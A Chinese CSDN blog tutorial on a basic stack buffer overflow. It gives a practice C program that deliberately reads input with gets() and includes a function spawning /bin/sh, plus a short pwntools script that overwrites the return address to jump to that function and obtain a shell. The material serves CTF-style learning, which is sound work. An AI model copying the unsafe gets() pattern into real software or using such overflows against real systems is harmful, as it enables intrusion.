无保护机制的PWN溢出(一)

最新推荐文章于 2023-03-17 21:31:06 发布
最新推荐文章于 2023-03-17 21:31:06 发布
阅读量614 收藏 2
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Jason_ZhouYetao/article/details/82589398
版权 
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <stdlib.h>
void login()
{
	char name[50];
	gets(name);
	printf("Welcome %syou are in the pwn world.\n",name);
}
void callsystem()
{
	system("/bin/sh");
}
int main()
{
	int random = rand(),key;
	//printf("%d\n", random);
	/*printf("Enter the key:");
	scanf("%d", &key);
	if ((key^random) == 1193046)
	{
		//printf("1\n");
		login();
		return 0;
	}
	else
	{
		//printf("2\n");
		exit(0);
	}*/
	login();
	return 0;
}

先给出源码,为了方便,这里把其他的一些比较的方式给略去了,都直接注释掉了,很明显,这个程序给出了callsys的函数,而且gets的漏洞也很明显,所以可以直接干了,这边看栈的高度可以直接用IDA,也可以用GDB配合着pattern去看,pattern脚本没有地方下载的我的博客就有资源,一个积分就够了,具体的步骤接下来仔细地讲讲:

这个是main函数,发现rand函数没有用,其实这里没有开启,有兴趣地可以把上面地源码注释地去掉再去做做看,然后查看login函数:

发现这里有个gets地漏洞,因为没有对输入地字符串进行限制,所以很容易就进行溢出,这里也可以看出栈地高度是0x40,而且程序是64位的,所以rbp的大小是8bit;

这里还有一个重要的函数就是callsys:

直接返回了/bin/sh,所以这里可以直接用这个地址作为返回的地址,接下来就直接给出脚本了:

#!/usr/bin/env python
# encoding: utf-8

from pwn import *
#p=remote("",)
p=process("./nokey",stdin=PTY)

callsys=0x0000000000400628
payload="A"*64+"A"*8+p64(callsys)

p.sendline(payload)


p.interactive()

 

callsys的函数的地址就是在IDA中看到的起始地址,而关于p=process("./nokey",stdin=PTY),这句话不加后面的是会报错的,之后执行一下就可以发现这个程序已经成功溢出了

Jason_ZhouYetao
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn溢出10道练习题有writeup
01-04
在网络安全领域,"pwn" 是一个常见的术语,通常用于指代与系统漏洞利用和控制权获取相关的挑战。CTF(Capture The Flag)是网络安全竞赛的一种形式,参赛者需要通过解决各种安全问题来获取“旗帜”或证明,以赢得...
三个pwn
weixin_52640415的博客
06-28 1665
shortcut :格式化字符串漏洞写溢出 lucky_guy:alloca负值覆盖ret babynote:libc-2.31禁用exec写 ORW free_hook->sigreturnframe-> setcontex+61->orw
攻防世界level2 x_64位
qq_44832048的博客
07-25 1574
64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可以做到,利用程序自己的带有pop edi/rdi;ret语句达到给edi赋值的效果。pop edi语句是将当前的栈顶元素传递给edi,在执行pop语句时,只要保证栈顶元素是”/bin/sh”的地址,并将返回地址设置为syst...
PWN基础知识及基础栈溢出手法
山高路远
04-12 3913
一、pwntools常用函数 函数 用途 send(data) 发送数据(字符串形式发送) sendline(data) 发送一行数据,默认在行尾加 \n(字符串形式发送) recv(numb=1096,timeout=default) 接收指定字节数的数据 buf = p.recvuntil(“\n”, drop=True) 直到接收到\n为止,drop=True表示丢弃\n,buf为接收到的输出但不包括丢弃的\n recvrepeat(timeout=default) 接
pwn溢出基础笔记
小白垃圾笔记2
03-17 736
压入栈内的数据包括调用参数,返回地址,调用函数的基地址,以及局部变量,其中调用参数以外的数据共同构成了被调用函数(callee)的状态。称之为“栈”是因为发生函数调用的时候,调用函数(caller)的状态保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶。函数调用的时候,栈的变化核心任务是将调用函数(caller)的状态保存起来,同时创建被调用函数(callee)的状态。在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态,恢复寄存器的值。
【七日打卡】Pwn之栈溢出利用详解
阿道夫的博客
12-22 921
🖥栈是汇编语言中的一种数据结构,遵循LIFO(Last in Fist Out)原则,即后进先出。压栈(Push)、出栈(Pop)。📌注意:栈从高地址向低地址存储。
PWN不欢沙龙演讲PPT.rar
05-20
4. **栈保护与地址空间布局随机化(ASLR)**:为了防止缓冲区溢出攻击,操作系统会使用这些防御机制,如Canary、DEP(数据执行保护)和ASLR(地址空间布局随机化)。理解这些机制的工作原理以及如何绕过它们是高级...
pwn入门题目汇总.rar
09-01
5. **栈保护机制的绕过**:现代操作系统和编译器为了防止溢出攻击,引入了如Canary、NX(Non-Executabe Stack)和ASLR(Address Space Layout Randomization)等保护机制。学习pwn还包括了解如何绕过这些防御。 6. ...
pwn_exp:pwn exps
04-19
7. **防护机制绕过**:现代系统通常有ASLR(地址空间布局随机化)、DEP(数据执行保护)等防护措施。Python可以协助你生成动态地址,并尝试绕过这些保护。 8. **shellcode编写**:一旦能够控制程序执行,你可能需要...
pwn:Pwn技术的集合
05-13
Pwn技术,通常在网络安全竞赛和黑客马拉松中被广泛使用,是一种通过利用程序漏洞来控制或改变程序执行流程的技术。这个“pwn”标签下的资源很可能是关于这一领域的学习资料或者实战工具集,特别是与Python编程相关的...
调试的技巧exit(0)
m0_53203911的博客
04-12 161
在代码的某一行后面加上exit(0);这一句话后,那么程序运行到这一句话直接结束
字符串溢出pwn溢出)--ret2syscall
莫慌的博客
09-29 758
pwn入门
WPF WPF中解决内存泄露的几点提示与解决方法
Swarb的博客:低头做事,抬头做人
04-18 1397
WPF WPF中解决内存泄露的几点提示与解决方法 2014-04-18 17:02 by swarb, ... 阅读, ... 评论, 收藏, 编辑 http://www.cnblogs.com/LastPropose/archive/2011/08/01/2124359.html 一直以来用WP...
nvvp 无法打开
qq_45875689的博客
05-20 382
nvvp 无法打开,警告: 正保存的数据被裁断到 1024 字符。成功: 指定的值已得到保存。
PWN-整数溢出
recover517的博客
12-06 1712
一、特殊数字 二、整数字节对照表 三、溢出类漏洞 四、符号转换类漏洞
pwn_warmup
weixin_44464829的博客
10-31 335
这个题没有附件,只好nc服务器: 发现给了我们一个类似地址的东西,该怎么利用。 猜想flag应该就在这个地址,或者这个地址的附近。这里不得不提到一个方法叫做fuzz(模糊测试): Fuzzing是指通过构造测试输入,对软件进行大量测试来发现软件中的漏洞的一种模糊测试方法。在CTF中,fuzzing可能不常用,但在现实的漏洞挖掘中,fuzzing因其简单高效的优势,成为非常主流的漏洞挖掘方法。 所以额,我们要写一个函数,这个函数可以为我们生成很多地址,如果这个地址正确了,flag就会被我拿到 d
字符串溢出pwn溢出)--ret2shellcode
莫慌的博客
09-26 2055
pwn 入门
buuctf pwn (第三波)学会利用整数溢出
月阴荒的博客
04-04 727
bjdctf_2020_babystack2 https://www.cnblogs.com/bhxdn/p/12331035.html
ctf pwn read溢出
最新发布
06-06
CTF(Capture the Flag)中的PWN(Practical Web ...5. **防御措施**:注意防范其他安全机制,如非NULL终止字符串检查、ASLR(地址空间_layout_randomization)和NX(No-execute)保护等,可能需要利用技巧绕过。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值